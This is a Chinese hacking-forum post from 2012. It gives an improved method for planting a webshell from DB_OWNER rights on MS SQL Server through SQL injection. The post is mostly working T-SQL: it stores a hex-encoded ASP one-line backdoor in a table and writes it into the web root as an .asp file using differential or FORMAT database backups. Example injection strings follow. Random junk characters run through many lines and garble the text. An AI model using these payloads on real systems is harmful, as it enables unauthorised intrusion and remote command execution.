中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]
作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
2 O1 n9 l  j2 f9 X* I. f; ]0 s, _0 C4 P6 w3 A( ^' `
一利用差异备份
9 v- C* K* l) k7 C8 ]; ~; L加一个参数WITH DIFFERENTIAL
# N: L& a0 u6 c( x2 a* _5 s% L3 C8 e  ?3 J0 R$ t7 I7 _* Q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
1 h4 w6 e. p, w; Wcreate table [dbo].[xiaolu] ([cmd] [image]);
7 H7 @6 J3 q3 x" o6 finsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. F$ q* |4 X+ `1 _- S7 m1 |declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL/ g  G3 r1 a/ ~+ k1 l! S: X, `

$ F6 e: Q: `+ g. w: G二利用完全FORMAT
4 L( n' S* K) C& O6 |# M. n$ B加一个参数WITH FROMAT
+ o) q- \; f2 Y  K有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以' C6 h, X3 S7 E! T! w! Q

& g$ Q/ U8 _! a  T) }declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s- P+ ?3 [! v% [6 ~
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
9 M  g# S: c0 }) b+ `2 G" Zdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT) M; ~" t+ N/ o! `' W+ C
- l4 V6 g8 ]6 o3 \5 q, W
总的来说就是那么简单几句,下面以备份数据库model为例子8 `8 q: H& I* K6 l/ |

  Z% g! p' y! d' V. x9 u5 E6 Nid=1;use model create table cmd(str image);insert into cmd(str) values (”)
7 N9 `7 h5 ]5 m- x- i( U+ @+ U8 A) X- X/ S; l
id=1;backup database model to disk=’你的路径‘ with differential,format;–& w/ r, ?& G' w' z. ~
, ?4 D6 E  D' W; F) ^& i5 B. ^




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2